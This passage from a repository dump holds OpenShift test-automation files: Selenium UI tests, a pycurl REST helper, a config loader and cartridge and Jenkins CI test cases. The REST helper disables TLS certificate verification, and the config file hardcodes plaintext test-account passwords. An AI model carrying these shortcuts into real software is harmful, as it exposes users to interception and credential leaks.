suite()\n" }, {
"alpha_fraction": 0.6764890551567078, "alphanum_fraction": 0.697805643081665, "avg_line_length": 28.518518447875977, "blob_id": "cd6ad3350d7675234eaa5cd7c3f9d153a9d53a53", "content_id": "1882edbee25dd53df7c66cf1badccf7629e0efd1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1595, "license_type": "no_license", "max_line_length": 491, "num_lines": 54, "path": "/automation/open/testmodules/UI/web/case_145623.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_145623.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n    def initialize(self):\n        pass\n\n    def finalize(self):\n        pass\n\n\nclass SignInFirstTime(OpenShiftTest):\n    def test_method(self):\n        web = self.config.web\n\n        web.login_new(web.username_not_accept_terms_account, web.password_not_accept_terms_account)\n        web.assert_text_equal_by_xpath(\"Legal terms\",\"//div[@id='content']/div/div/div/div/div/h1\")\n        web.assert_text_equal_by_xpath('''Please Accept the Following Terms\\nBefore participating in the OpenShift Preview Program and receiving the Preview Services, Preview Software and access to online properties, you need to accept certain terms and conditions. 
The link below contains a list of the terms that will apply to your use.\\nOpenShift Legal Terms and Conditions\\nClicking I accept means that you agree to the above terms.''',\"//div[@id='content']/div/div/div/div/div/section\")\n\n \n self.tearDown()\n\n return self.passed(\" case_145623--SignInFirstTime passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(SignInFirstTime)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_145623.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5963888764381409, "alphanum_fraction": 0.597777783870697, "avg_line_length": 27.34645652770996, "blob_id": "45725d4730e0472418b4500a4db19abc820c2670", "content_id": "0855b1e1eee668554d8c1bc62a0ef82a7423b608", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3600, "license_type": "no_license", "max_line_length": 90, "num_lines": 127, "path": "/automation/open/lib/rest_client.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nfrom StringIO import StringIO\nfrom urllib import urlencode\nimport pycurl\nimport common\n\n#\n# Valid return outputs are:\n# 1. http_code\n# 2. http_output\n#\nclass RHC:\n\n def __init__(self, path, output = \"http_code\", format = \"application/xml\"):\n server = common.get_instance_ip()\n (username, password) = common.get_default_rhlogin()\n\n self.output = output\n self.curl = pycurl.Curl()\n\n print \"Configuring URL...\"\n self.curl.setopt(pycurl.URL, \"https://%s/broker/rest/%s\" % (server, path))\n\n print \"Configuring Verbosity...\"\n self.curl.setopt(pycurl.VERBOSE, 1)\n\n print \"Configuring HTTP Basic Auth...\"\n self.curl.setopt(pycurl.HTTPAUTH, pycurl.HTTPAUTH_BASIC)\n\n print \"Configuring Username and Password...\"\n self.curl.setopt(pycurl.USERPWD, \"%s:%s\" % ( username, password ))\n\n print \"Configuring SSL_Verify_Peer option...\"\n self.curl.setopt(pycurl.SSL_VERIFYPEER, 0)\n\n if output == \"http_output\":\n print \"Configuring the writer function...\"\n self.b = StringIO()\n self.curl.setopt(pycurl.WRITEFUNCTION, self.b.write)\n \n print \"Configuring HTTP headers %s...\" % ( format )\n self.curl.setopt(pycurl.HTTPHEADER, [ \"Accept: %s\" % ( format )])\n\n def set_option(self, option, value):\n self.curl.setopt(option, value)\n \n def perform(self):\n print \"Performing...\"\n self.curl.perform()\n\n def get_output(self):\n \"\"\"\n This function returns the required output. 
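As an\n        illustrative sketch (the \"domains\" path here is an assumption,\n        chosen to match the helper functions below):\n\n            curl = RHC(\"domains\", output=\"http_code\")\n            curl.perform()\n            status = curl.get_output()\n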
\n        Currently the following output types are supported:\n\n        http_code = The HTTP return code\n        http_output = The content itself\n\n        Required output type is configured in the constructor.\n        \"\"\"\n        \n        if self.output == \"http_code\":\n            return self.curl.getinfo(pycurl.HTTP_CODE)\n        elif self.output == \"http_output\":\n            return self.b.getvalue()\n\n#\n# RHC REST - GET\n#\ndef rhc_rest_get(path, output = \"http_code\", format = \"application/xml\"):\n    curl = RHC(path, output, format)\n    curl.perform()\n\n    return curl.get_output()\n\n#\n# RHC REST - POST\n#\ndef rhc_rest_post(path, output = \"http_code\", format = \"application/json\", data = dict()):\n    # Initialize the request wrapper\n    curl = RHC(path, output, format)\n\n    print \"Configuring POST...\"\n    curl.set_option(pycurl.POST, 1)\n\n    print \"Configuring POST fields...\"\n    curl.set_option(\n        pycurl.POSTFIELDS,\n        urlencode(data)\n    )\n\n    curl.perform()\n\n    return curl.get_output()\n\ndef scale_up(domain, application):\n    return rhc_rest_post(\n        \"domains/%s/applications/%s/events\" % ( domain, application ),\n        output = \"http_code\",\n        format = \"application/xml\",\n        data = { \"event\" : \"scale-up\" }\n    )\n\ndef scale_down(domain, application):\n    return rhc_rest_post(\n        \"domains/%s/applications/%s/events\" % ( domain, application ),\n        output = \"http_code\",\n        format = \"application/xml\",\n        data = { \"event\" : \"scale-down\" }\n    )\n\ndef add_alias(domain, application, alias):\n    return rhc_rest_post(\n        \"domains/%s/applications/%s/events\" % ( domain, application), \n        output = \"http_code\",\n        format = \"application/xml\",\n        data = { \"event\" : \"add-alias\", \"alias\" : alias }\n    )\n\ndef remove_alias(domain, application, alias):\n    return rhc_rest_post(\n        \"domains/%s/applications/%s/events\" % ( domain, application ), \n        output = \"http_code\", \n        format = \"application/xml\",\n        data = { \"event\" : \"remove-alias\", \"alias\" : alias }\n    )\n" }, {
"alpha_fraction": 0.6424344778060913, "alphanum_fraction": 0.6546914577484131, "avg_line_length": 37.14516067504883, "blob_id": "95d102d9d01e77b4056904d3b65028157ebd9f84", "content_id": "0e3f27b75206ef0cfc55d42e59adbbdded8fd07b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4732, "license_type": "no_license", "max_line_length": 126, "num_lines": 124, "path": "/automation/open/testmodules/UI/web/config.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n## Global variable configuration\n# set global variable values\nimport string\nimport ConfigParser\n\nclass Config():\n    def __init__(self):\n        configparse = ConfigParser.RawConfigParser()\n        configparse.read('config.cfg')\n        self.timeoutsec=configparse.get('environment', 'timeoutsec')\n        self.password=configparse.get('environment', 'password')\n        self.browser=configparse.get('environment', 'browser')\n        self.browserpath=configparse.get('environment', 'browserpath')\n        self.proxy=configparse.get('environment', 'proxy')\n        self.url=configparse.get('environment', 'url')\n        self.resultfile=configparse.get('output', 'resultfile')\n        self.description=configparse.get('output', 'description')\n        self.title=configparse.get('output', 'title')\n        self.confirm_url_express=configparse.get('environment', 'confirm_url_express')\n        self.confirm_url_express_yujzhang=configparse.get('environment', 'confirm_url_express_yujzhang')\n        self.confirm_url_express_yujzhang_invalidkey=configparse.get('environment', 'confirm_url_express_yujzhang_invalidkey')\n        self.confirm_url_flex=configparse.get('environment', 'confirm_url_flex')\n        self.restricted_user=configparse.get('environment', 'restricted_user')\n        self.invalid_user=configparse.get('environment', 'invalid_user')\n        self.toregister_user=configparse.get('environment', 'toregister_user')\n        self.new_user=configparse.get('environment', 'new_user')\n        self.granted_user = [\"[email protected]\",\"123456\"]\n        self.granted_user2 = [\"[email protected]\",\"111111\"]\n        self.rhn_user = [\"[email protected]\",\"redhat\"]\n        self.exist_domain=configparse.get('environment', 'exist_domain')\n        self.ssh_key_file=configparse.get('environment', 'ssh_key_file')\n        self.tochangepwduser = [\"[email protected]\",\"111111\",\"111111\"]\n        self.domainuser = [\"[email protected]\",\"111111\"]\n        self.libra_server=configparse.get('environment', 'libra_server')\n        self.dashboard_path=self.url+\"/app/dashboard\"\n        self.control_panel=self.url+\"/app/control_panel\"\n        self.registration_page=self.url+\"/app/user/new\"\n        self.express_registration_page=self.url+\"/app/user/new/express\"\n        self.flex_registration_page=self.url+\"/app/user/new/flex\"\n        self.flex_console=self.url+\"/flex/flex/index.html\"\n\nif __name__ == \"__main__\":\n    config = Config()\n\n\ndef baseconfirm_url(confirmation_link):\n    pathstart = str.index(confirmation_link, \"app\")\n    return confirmation_link[:pathstart]\n\ndef _split_confirm_link(confirmation_link):\n    # Shared parsing helper (not in the original module API): splits a\n    # confirmation link of the form <base>/app/...?key=<key>&...=<email>\n    # into the pieces the functions below need, rather than each function\n    # repeating the same parsing.\n    pathstart = str.index(confirmation_link, \"app\")\n    base = confirmation_link[:pathstart - 1]\n    path = confirmation_link[pathstart - 1:]\n    j = str.index(path, \"&\")\n    m = str.index(path, \"?\")\n    key = path[str.index(path, \"=\") + 1:j]\n    temp_email = path[str.rindex(path, \"=\") + 1:]\n    return base, path, j, m, key, temp_email\n\ndef email(confirmation_link):\n    base, path, j, m, key, temp_email = _split_confirm_link(confirmation_link)\n    return str.replace(str.replace(temp_email, \"%2B\", \"+\"), \"%40\", \"@\")\n\ndef invalidemail_confirm_url(confirmation_link):\n    # NOTE: the previous body relied on an undefined module-level 'url';\n    # the base URL is derived from the link itself instead.\n    base, path, j, m, key, temp_email = _split_confirm_link(confirmation_link)\n    return base + str.replace(path, temp_email, \"ere\")\n\ndef invalidkey_confirm_url(confirmation_link):\n    base, path, j, m, key, temp_email = _split_confirm_link(confirmation_link)\n    return base + str.replace(path, key, \"rere\")\n\ndef noemail_confirm_url(confirmation_link):\n    base, path, j, m, key, temp_email = _split_confirm_link(confirmation_link)\n    return base + path[:j - 1]\n\ndef nokey_confirm_url(confirmation_link):\n    base, path, j, m, key, temp_email = _split_confirm_link(confirmation_link)\n    return base + path[:m + 1] + path[j + 1:]\n\ndef validemail_confirm_url(confirmation_link):\n    base, path, j, m, key, temp_email = _split_confirm_link(confirmation_link)\n    return base + path\n\n\n" }, {
"alpha_fraction": 0.6130977869033813, "alphanum_fraction": 0.620853066444397, "avg_line_length": 30.33783721923828, "blob_id": "75e118019baddadd618aaa277c62e9e779f79111", "content_id": "16381dd8f8345a8541db6cce0620089c6fe28492", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2321, "license_type": "no_license", "max_line_length": 358, "num_lines": 74, "path": "/automation/open/testmodules/RT/cartridge/horiz_scaling_mysql.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\n#\n# File name: horiz_scaling_mysql.py\n# Date: 2012/03/09 02:30\n# Author: [email protected]\n#\n\nimport sys\nimport subprocess\nimport os\nimport string\nimport re\n\nimport rhtest\nimport testcase\nimport common\nimport OSConf\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n\n self.app_name = 'scalapp'\n try:\n self.app_type = self.config.test_variant\n except:\n self.app_type = 'php'\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass HorizScalingMysql(OpenShiftTest):\n def test_method(self):\n #1. create manually scalable APP\n ret = common.create_scalable_app(self.app_name, \n common.app_types[self.app_type],\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd)\n\n self.assert_equal(ret, 0, \"Unable to create scalable PHP application\")\n\n #embed with MYSQL\n ret = common.embed(self.app_name,\n \"add-%s\"%common.cartridge_types['mysql'], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret,0, \"To embed MySQL should work\")\n #or use this direct call?\n #cmd = 'curl -k -H \"Accept: application/xml\" -u \"%s:%s\" https://%s/broker/rest/domains/%s/applications/scala/cartridges -X POST -d name=%s -d cartridge=%s -d %s=\"%s\"'%(self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, libra_server, self.config.OPENSHIFT_domain_name, self.app_name,common.cartridge_types['mysql'],'haproxy','mysql')\n #(status, output) = common.command_getstatusoutput(cmd)\n #if status!=0:\n # print \"ERROR: Unable to create scalable PHP application\"\n # sys.exit(status)\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n #if case.testcase_status == 'FAILED':\n # return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(HorizScalingMysql)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of horiz_scaling_mysql.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5364806652069092, "alphanum_fraction": 0.5364806652069092, "avg_line_length": 12.423076629638672, "blob_id": "8e4fdb9bfaafc7d18e97a4b9c7817882c1c7fc84", "content_id": "014cc2547a9b3b81ec5dc87455cffd1d463d3a8d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 699, "license_type": "no_license", "max_line_length": 48, "num_lines": 52, "path": "/automation/open/code.rst", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "****************************\nAuto Generated Documentation\n****************************\n\nIndices and tables\n==================\n\n* :ref:`modindex`\n\n.. autosummary::\n\nCore RHTest\n===========\n\n.. automodule:: rhtest \n :members:\n\n.. automodule:: rhtestrunner\n :members:\n\n.. automodule:: tcms\n :members:\n\n.. automodule:: storage\n :members:\n\n.. 
automodule:: OSConf\n   :members:\n\nCommon and Helper functions\n===========================\n\n.. automodule:: common\n   :members:\n\n.. automodule:: helper\n   :members:\n\n.. automodule:: proc\n   :members:\n\nWeb support\n-----------\n\n.. automodule:: autoweb\n   :members:\n\n\nNaming conventions\n==================\n\n.. literalinclude:: docs/nameing_conventions.txt\n\n" }, {
"alpha_fraction": 0.6064993739128113, "alphanum_fraction": 0.6135778427124023, "avg_line_length": 45.0444450378418, "blob_id": "8a2f137425e5ec826b21a117941c761082bff13c", "content_id": "655168182febe11714d632d67a4078430ff45645", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6216, "license_type": "no_license", "max_line_length": 179, "num_lines": 135, "path": "/automation/open/testmodules/RT/cartridge/configuration_files_referceable_in_standalone_xml.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n    INTERACTIVE = False\n\n    def initialize(self):\n        self.summary = \"[US994][rhc-cartridge] Configuration files referenceable in standalone.xml\"\n        self.user_email = os.environ[\"OPENSHIFT_user_email\"]\n        self.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n        self.app_name = \"standalone\" + common.getRandomString(4)\n        self.app_type = common.app_types[\"jbossas\"]\n        self.git_repo = os.path.abspath(os.curdir)+os.sep+self.app_name\n        self.app_uuid = \"\"\n\n        common.env_setup()\n        self.steps_list = []\n\n    def finalize(self):\n        os.system('rm -rf %s*' % (self.app_uuid))\n\n\nclass ConfigurationFilesReferenceableInStandaloneXml(OpenShiftTest):\n\n    def check_softlink(self):\n        self.app_uuid = OSConf.get_app_uuid(self.app_name)\n        exp_str = \"xx.xml -> /var/lib/openshift/%s/app-root/runtime/repo/.openshift/config/xx.xml\" % (self.app_uuid)\n        cmd = \"cd %s/jbossas-7/jbossas-7/standalone/configuration && ls -l\" % (self.app_uuid)\n        (ret, output) = common.command_getstatusoutput(cmd)\n        if ret == 0 and output.find(exp_str) != -1:\n            self.info(\"Successfully found '%s' in the output\" % (exp_str))\n            return 0\n        else:\n            self.info(\"Failed to find '%s' in the output\" % (exp_str))\n            return 1\n\n    def test_method(self):\n        # 1.Create an app\n        self.steps_list.append(testcase.TestCaseStep(\"1. Create a jbossas app: %s\" % (self.app_name),\n            common.create_app,\n            function_parameters=[self.app_name, self.app_type, self.user_email, self.user_passwd],\n            expect_description=\"the app should be created successfully\",\n            expect_return=0,\n            ))\n        # 2.Make some changes to the git repo\n        self.steps_list.append(testcase.TestCaseStep(\"2.Make some changes to the git repo\",\n            \"touch %s/.openshift/config/xx.xml && [ -d %s/.openshift/config/modules/ ] || mkdir %s/.openshift/config/modules/\" % (self.git_repo, self.git_repo, self.git_repo),\n            expect_description=\"Git repo successfully modified\",\n            expect_return=0,\n            ))\n        # 3.Git push all the changes\n        self.steps_list.append(testcase.TestCaseStep(\"3.Git push all the changes\",\n            \"cd %s && git add . && git commit -am t && git push\" % (self.git_repo),\n            expect_description=\"Git push should succeed\",\n            expect_return=0,\n            ))\n        # 4.Check app via browser\n        self.steps_list.append(testcase.TestCaseStep(\"4.Check the app via browser\",\n            common.check_web_page_output,\n            function_parameters=[self.app_name, ],\n            expect_description=\"The app should be available\",\n            expect_return=0\n            ))\n        # 5.Save snapshot of this app and extract\n        self.steps_list.append(testcase.TestCaseStep(\"5.Save snapshot of this app\",\n            \"rhc snapshot save %s -l %s -p '%s' %s && tar xzf %s.tar.gz\" % (self.app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS, self.app_name),\n            expect_description=\"Snapshot should be saved and extracted successfully\",\n            expect_return=0,\n            ))\n        # 6.Check snapshot to see soft link of configuration files\n        self.steps_list.append(testcase.TestCaseStep(\"6.Check snapshot to see soft link of configuration files\",\n            self.check_softlink,\n            expect_description=\"Soft link of configuration files should be found\",\n            expect_return=0,\n            ))\n        # 7.Remove config file in git repo and git push\n        self.steps_list.append(testcase.TestCaseStep(\"7.Remove config file in git repo\",\n            \"cd %s && git rm .openshift/config/xx.xml && git commit -am t && git push\" % (self.git_repo),\n            expect_description=\"Git push should succeed\",\n            expect_return=0,\n            ))\n        # 8.Remove <app_name>.tar.gz and the extracted dir\n        self.steps_list.append(testcase.TestCaseStep(\"8.Remove <app_name>.tar.gz and the extracted dir\",\n            \"rm -rf %s && rm -f %s.tar.gz\" % (self.app_uuid, self.app_name),\n            expect_description=\"<app_name>.tar.gz and the extracted dir should be removed\",\n            expect_return=0,\n            ))\n        # 9.Save snapshot again\n        self.steps_list.append(testcase.TestCaseStep(\"9.Save snapshot again\",\n            \"rhc snapshot save %s -l %s -p '%s' %s && tar xzf %s.tar.gz\" % (self.app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS, self.app_name),\n            expect_description=\"Snapshot should be saved and extracted successfully\",\n            expect_return=0,\n            ))\n        # 10.Check snapshot to see soft link of configuration files disappear\n        self.steps_list.append(testcase.TestCaseStep(\"10.Check snapshot to see soft link of configuration files disappear\",\n            \"ls -l %s/jbossas-7/jbossas-7/standalone/configuration/xx.xml\" % (self.app_uuid),\n            expect_description=\"Soft link of configuration files should not be found\",\n            expect_return=\"!0\",\n            expect_string_list=[\"No such file or directory\",],\n            ))\n        case = testcase.TestCase(self.summary, self.steps_list)\n        try:\n            case.run()\n        except testcase.TestCaseStepFail:\n            return self.failed(\"%s failed\" % self.__class__.__name__)\n\n        if case.testcase_status == 'PASSED':\n            return self.passed(\"%s passed\" % self.__class__.__name__)\n        if case.testcase_status == 'FAILED':\n            return self.failed(\"%s failed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(ConfigurationFilesReferenceableInStandaloneXml)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n" }, {
"alpha_fraction": 0.6301020383834839, "alphanum_fraction": 0.6358418464660645, "avg_line_length": 32.36170196533203, "blob_id": "892b604800a2787b18c09b9222af9d01be1eb14a", "content_id": "0ce7423649f5393e766f59a69823d78c8183c5da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1568, "license_type": "no_license", "max_line_length": 
99, "num_lines": 47, "path": "/automation/open/testmodules/RT/quick_start/quick_start_gollum_ruby19.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport common\nimport OSConf\nimport rhtest\n# user defined packages\nfrom time import sleep\nfrom quick_start_test import QuickStartTest\n\nclass QuickStartGollum(QuickStartTest):\n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_type = common.app_types[\"ruby-1.9\"]\n self.config.application_embedded_cartridges = [ ]\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: gollum - with Ruby 1.9\"\n self.config.git_upstream_url = \"git://github.com/openshift/gollum-openshifted.git\"\n self.config.page = \"\" # means '/'\n self.config.page_pattern = \"Create New Page\"\n \n def verification(self):\n self.log_info(\"Verifying\")\n sleep(30) # Waiting 30 seconds before checking\n app_url = OSConf.get_app_url(self.config.application_name)\n ret_code = common.grep_web_page(\n \"http://%s/\" % app_url,\n self.config.page_pattern,\n options = \"-L -H 'Pragma: no-cache' -u wiki:wiki\" \n )\n self.assert_equal(ret_code, 0, \"Pattern %s must be found\" % self.config.page_pattern)\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartGollum)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.4941938519477844, "alphanum_fraction": 0.5082508325576782, "avg_line_length": 41.38859939575195, "blob_id": "ca30ea024f4a8ece7227cc5b391835522a8c06f0", "content_id": "4dd6e8705d5d2891d99e560fc019e7c5ebc95e40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8181, "license_type": "no_license", "max_line_length": 157, "num_lines": 193, "path": "/automation/open/testmodules/RT/cartridge/jenkins_ci_testing.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n\nRefactored by\nAttila Nagy\[email protected]\nJun 11, 2012\n\n[US1178 & US1034][RT] Create Jenkins cartridge application for CI testing\nhttps://tcms.engineering.redhat.com/case/122369/\n\"\"\"\n\nimport rhtest\nimport common\nfrom shutil import rmtree\nimport fileinput\nimport re\nimport OSConf\nimport proc\nimport os\nimport time\n\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.info(\"[US1178 & US1034] [rhc-cartridge] Create Jenkins cartridge application for CI testing\")\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"Missing variant, using `zend` as default\")\n self.test_variant = 'jbosseap'\n\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.app_name = self.test_variant.split('-')[0] + \"ci\" + common.getRandomString(3)\n self.git_repo = \"./%s\" % (self.app_name)\n self.app_type = common.app_types[self.test_variant]\n common.env_setup()\n self.random_string = common.getRandomString()\n self.deployment_configuration = {\n \"php\": {\"index\": \"php/index.php\"},\n \"zend\": {\"index\": \"php/index.php\"},\n \"jbossas\": {\"index\": \"src/main/webapp/index.html\"},\n \"jbosseap\": {\"index\": \"src/main/webapp/index.html\"},\n \"python\": {\"index\": \"wsgi/application\"},\n \"ruby\": {\"index\": \"config.ru\"},\n \"ruby-1.9\": 
{\"index\": \"config.ru\"},\n \"nodejs\" : {\"index\": \"index.html\"},\n \"perl\": {\"index\": \"perl/index.pl\"}}\n\n def finalize(self):\n #rmtree(self.app_name, ignore_errors = True)\n if self.test_variant == \"jbossas\" or self.test_variant == \"jbosseap\":\n if self.get_run_mode() == \"DEV\":\n pass\n # back to small profile\n #common.change_node_profile(\"small\")\n #common.remove_gearsize_capability('medium')\n\nclass JenkinsCITesting(OpenShiftTest):\n \n def test_method(self):\n self.info(\"=================================\")\n self.info(\"1.Create an jenkins app\")\n self.info(\"=================================\")\n ret_code = common.create_app(\"server\", common.app_types[\"jenkins\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, False)\n self.assert_equal(ret_code, 0, \"Jenkins server must be created successfully\")\n \n self.info(\"=================================\")\n self.info(\"2. Create an application\")\n self.info(\"=================================\")\n ret_code = common.create_app(self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret_code, 0, \"Failed to create %s app: %s\" % (self.app_type, self.app_name))\n \n if self.test_variant in (\"jbossas\", \"jbosseap\"):\n sleep_time = 600\n # JBoss needs larger node profile to build\n if self.get_run_mode() == \"DEV\":\n #20120615: we don't need to change node profile any more\n pass\n #common.add_gearsize_capability('medium')\n #ret = common.change_node_profile(\"medium\")\n #self.assert_equal(ret, 0, \"The change of node profile to medium should pass.\")\n #time.sleep(30)\n else:\n sleep_time = 300\n \n self.info(\"=================================\")\n self.info(\"3. Embed jenkins client to the app\")\n self.info(\"=================================\")\n ret_code = common.embed(self.app_name, \n \"add-\" + common.cartridge_types[\"jenkins\"], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret_code, 0, \"Jenkins client must be embedded successfully\")\n \n self.info(\"=================================\")\n self.info(\"4.Make some change in the git repo\")\n self.info(\"=================================\")\n try:\n index_file = self.git_repo + \"/\" + self.deployment_configuration[self.test_variant][\"index\"]\n self.info(\"Editing: \" + index_file)\n for line in fileinput.input(index_file, inplace = True):\n print re.sub(\"Welcome to OpenShift\", self.random_string, line),\n except:\n fileinput.close()\n self.info(\"IO error\")\n return False\n fileinput.close()\n \n try:\n start_hook_file = \"/.openshift/action_hooks/build\"\n #start_hoot_file = \"./.openshift/action_hooks/build\"\n self.info(\"Editing: \" + start_hook_file)\n start_hook = open(self.git_repo + start_hook_file, \"w+\")\n start_hook.write(\"set -x\\nsleep 30\\n\")\n start_hook.close()\n os.chmod(self.git_repo + start_hook_file, 0744)\n except:\n self.info(\"IO Error \")\n return False\n \n self.info(\"=================================\")\n self.info(\"5. Git push all the changes in a subprocess\")\n self.info(\"=================================\")\n deployment_steps = [\n \"cd %s\" % self.app_name,\n \"git add .\",\n \"git commit -a -m testing\",\n \"git push\" \n ]\n deployment_process = proc.Proc(\" && \".join(deployment_steps))\n\n self.info(\"=================================\")\n self.info(\"6. 
Jenkins build job should start in given time\")\n self.info(\"=================================\")\n ret_code = deployment_process.grep_output(\"Waiting for job to complete\", 5, 60)\n self.assert_equal(ret_code, 0, \"Job must be waiting for start\")\n self.info(\"sleep %ss to wait jenkins job finished\" %(sleep_time))\n\ttime.sleep(sleep_time)\n\n self.info(\"=================================\")\n self.info(\"7. Check if jenkins build job is running\")\n self.info(\"=================================\")\n job_url = OSConf.default.conf['apps'][self.app_name]['embed']['jenkins-client-1.4']['url']\n option = \"-k -H 'Pragma: no-cache' -u %s:%s\" % (OSConf.default.conf[\"apps\"][\"server\"][\"username\"], OSConf.default.conf[\"apps\"][\"server\"][\"password\"])\n ret_code = common.grep_web_page(job_url + \"1/consoleText\", \"sleep 30\", option, 7, 15)\n self.assert_equal(ret_code, 0)\n \n self.info(\"=================================\")\n self.info(\"8. Check if the normal app is still available\")\n self.info(\"=================================\")\n ret_code = common.grep_web_page(OSConf.get_app_url(self.app_name), \n self.random_string, \n \"-H 'Pragma: no-cache'\", 5, 30 )\n self.assert_equal(ret_code, 0)\n \n self.info(\"=================================\")\n self.info(\"9. Wait for git push to finish\")\n self.info(\"=================================\")\n deployment_process.wait(5, 10)\n \n self.info(\"=================================\")\n self.info(\"10. Check if jenkins build is finished successfully\")\n self.info(\"=================================\")\n ret_code = common.grep_web_page(job_url + \"1/api/xml\", \n '<result>SUCCESS</result>', option, 60, 30)\n self.assert_equal(ret_code, 0)\n \n self.info(\"=================================\")\n self.info(\"11. 
Check if the normal app is still available\")\n self.info(\"=================================\")\n ret_code = common.grep_web_page(OSConf.get_app_url(self.app_name), \n self.random_string, \"-H 'Pragma: no-cache'\", 5, 20)\n self.assert_equal(ret_code, 0)\n \n return self.passed(\"[US1178 & US1034] [rhc-cartridge] Create Jenkins cartridge application for CI testing\")\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JenkinsCITesting)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5874357223510742, "alphanum_fraction": 0.6002938747406006, "avg_line_length": 31.39285659790039, "blob_id": "97c39ce127bdfd1cdc36be304844df9b92e06058", "content_id": "a03413ff05d60a34e066e5c8978684ebab81b4b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2722, "license_type": "no_license", "max_line_length": 164, "num_lines": 84, "path": "/automation/open/testmodules/RT/cartridge/mms_agent_without_mongodb.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n#\n# File name: mms_agent_without_mongodb.py\n# Date: 2012/02/27 07:29\n# Author: [email protected]\n#\n\nimport sys\nimport os\n\nimport testcase, common, OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US1352][UI][rhc-client]Embed mms-agent without mongodb embeded\"\n self.app_name = common.getRandomString(10)\n self.app_type = 'php'\n self.tcms_testcase_id = 126400\n self.steps_list = []\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass MmsAgentWithoutMongodb(OpenShiftTest):\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\"Create an app\",\n common.create_app,\n function_parameters=[self.app_name, 